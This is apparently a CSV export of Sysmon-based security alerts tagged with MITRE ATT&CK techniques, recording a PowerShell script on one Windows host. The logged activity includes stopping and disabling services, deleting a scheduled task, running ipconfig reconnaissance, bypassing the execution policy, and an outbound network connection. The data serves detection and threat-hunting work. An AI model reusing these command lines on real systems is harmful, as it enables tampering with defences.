Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.130330200Z"",""eventRecordID"":""2608"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.128\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001025da2000}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.128"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001025da2000}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.478",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.055 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001091d72000} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.058036800Z"",""eventRecordID"":""2605"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.055\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001091d72000}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.055"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001091d72000}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.462",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.037 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010c6d62000} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SVSHost Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SVSHost Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.041413500Z"",""eventRecordID"":""2604"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.037\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010c6d62000}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SVSHost Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.037"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010c6d62000}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SVSHost Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.400",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.001 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001031d52000} +ProcessId: 5964 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.012980100Z"",""eventRecordID"":""2602"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.001\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001031d52000}\r\nProcessId: 5964\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.001"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001031d52000}"",""processId"":""5964"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:40.869",8,"ATT&CK T1086: PowerShell Network Connections","""Network connection detected: +RuleName: +UtcTime: 2020-05-28 12:50:11.316 +ProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ProcessId: 2268 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 50014 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 50.19.115.217 +DestinationHostname: +DestinationPort: 443 +DestinationPortName: https""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:12.494410500Z"",""eventRecordID"":""2598"",""processID"":""2260"",""threadID"":""2980"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:11.316\r\nProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nProcessId: 2268\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 50014\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 50.19.115.217\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:11.316"",""processGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""processId"":""2268"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""50014"",""destinationIsIpv6"":""false"",""destinationIp"":""50.19.115.217"",""destinationPort"":""443"",""destinationPortName"":""https""}}}", +"May 29, 2020 @ 14:18:38.042",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:09.606 +ProcessGuid: {df9fc3d3-b381-5ecf-0000-001073791f00} +ProcessId: 3880 +Image: C:\Windows\System32\ipconfig.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: IP Configuration Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: ipconfig.exe +CommandLine: ""C:\Windows\system32\ipconfig.exe"" /all +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\system32\\ipconfig.exe\"" /all",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:09.613595500Z"",""eventRecordID"":""2529"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:09.606\r\nProcessGuid: {df9fc3d3-b381-5ecf-0000-001073791f00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\ipconfig.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: IP Configuration Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ipconfig.exe\r\nCommandLine: \""C:\\Windows\\system32\\ipconfig.exe\"" /all\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:09.606"",""processGuid"":""{df9fc3d3-b381-5ecf-0000-001073791f00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\ipconfig.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""IP Configuration Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""ipconfig.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\"" /all"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=741462AB431A22233C787BAAB9B653C7,SHA256=A4370C0CF81686C0B696FA6261C9D3E0D810AE704AB8301839DFFD5D5112F476,IMPHASH=34F72BB663765CAD1BC50368A1637C03"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:18:33.509",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.229 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001027ca1e00} +ProcessId: 5044 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.232228100Z"",""eventRecordID"":""2527"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.229\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001027ca1e00}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.229"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001027ca1e00}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 